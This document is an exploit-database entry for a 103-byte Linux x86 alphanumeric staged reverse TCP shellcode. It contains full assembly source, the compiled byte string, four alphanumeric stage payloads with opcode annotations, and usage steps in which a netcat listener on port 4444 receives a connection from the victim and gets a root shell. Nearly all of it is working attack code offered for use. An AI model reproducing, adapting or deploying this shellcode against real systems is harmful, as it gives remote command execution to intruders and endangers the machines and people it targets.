###########################

# Linux/x86 Reverse TCP Alphanumeric Staged Shellcode (103 bytes)

###########################

########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ########
            ########### Author: Snir Levi, Applitects #############
                    ## 103 Bytes ##
 
date: 9.2.17
Automatic python shellcode handler (with stage preset send) will be ready soon:
https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/
 
 
IP -    127.0.0.1
PORT -  4444                        
                         
#### Stage Alphanumeric shellcode: #####
Stage 1:
dup2 stdin syscall:
 
WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
 
W   push edi
X   pop eax
W   push edi
[   pop ebx
j?  push 0x3f
X   pop eax
V   push esi
[   pop ebx
W   push edi
Y   pop ecx
P   push eax
X   pop eax
P   push eax
X   pop EAX
 
Stage 2:
dup2 stdout syscall:
 
WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
 
W   push edi
X   pop eax
W   push edi
[   pop ebx
j?      push 0x3f
X       pop eax
V       push esi
[       pop ebx
W       push edi
Y       pop ecx
A   inc ecx (ecx =1)
P       push eax
X       pop eax
P       push eax
 
Stage 3:
dup2 stderr syscall:
 
WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
 
W   push edi
X   pop eax
W   push edi
[   pop ebx
j?      push 0x3f
X       pop eax
V       push esi
[       pop ebx
W       push edi
Y       pop ecx
A*2     inc ecx (ecx = 2)
P       push eax
X       pop eax
A       inc ecx
 
Stage 3:
execve /bin/sh:
 
j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
 
j0      push 0x30
X       pop eax
H*32        dec eax //eax = 0x0b
W       push edi
Y       pop ecx
W       push edi
Z       pop edx
W       push edi // null terminator
h//sh       push 0x68732f2f //sh
h/bin       push 0x6e69622f /bin
T       push esp
[       pop ebx
 
Usage: Victim Executes the shellcode, and opens tcp connection 
 
Stage:
        After Connection is established, send the 4 stages ***separately***
         
        nc -lvp 4444
        connect to [127.0.0.1] from localhost [127.0.0.1] (port)
        WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
        WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
        WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
        j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
         
        whoami
        root
        id
        uid=0(root) gid=0(root) groups=0(root)
 
         
global _start
 
 
_start:
 
        ; sock = socket(AF_INET, SOCK_STREAM, 0)
        ; AF_INET = 2
        ; SOCK_STREAM = 1
        ; syscall number 102 - socketcall
    ; socket = 0x01
 
    xor eax,eax
    xor esi,esi
    push eax
    pop edi
    push eax
    mov al, 0x66
    push byte 0x1
    pop ebx
    push byte ebx
    push byte 0x2
    mov ecx, esp
    int 0x80
 
    xchg esi, eax;  save sock result
 
    ; server.sin_family = AF_INET
        ; server.sin_port = htons(PORT)
        ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
 
    push byte 0x1
    pop edx
    shl edx, 24
    mov dl, 0x7f    ;edx = 127.0.0.1 (hex)
    push edx
    push word 0x5c11 ;port 4444
    push word 0x02
 
        ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
 
    mov al, 0x66
    mov bl, 0x3
    mov ecx, esp
    push byte 0x10
    push ecx
    push esi
    mov ecx ,esp
    int 0x80
 
 
stageAddress:       ;saves stage address to edx
        mov edx, [esp]
    sub bl,3
    jnz stage
 
call near stageAddress 
 
    ;recv(int sockfd, void *buf, size_t len, int flags);
 
stage:
    mov al, 0x66
    mov bl, 10
    push edi
    push word 100   ; buffer size
    push edi
    push esi    ; socketfd
    mov [esp+4],esp ; sets esp as recv buffer
    mov ecx,esp
    int 0x80
        mov al, 0xcd
        mov ah, 0x80 ; eax = int 0x80
        mov bl, 0xFF
        mov bh, 0xE2 ; ebx = jmp edx
        mov [esp+57],al
        mov [esp+58],ah
        mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage
    jmp esp
 
 
 
unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a
\x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52
\x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1
\xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff
\xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0
\xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a
\x89\x5c\x24\x3b\xff\xe4"

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-02-11]

###########################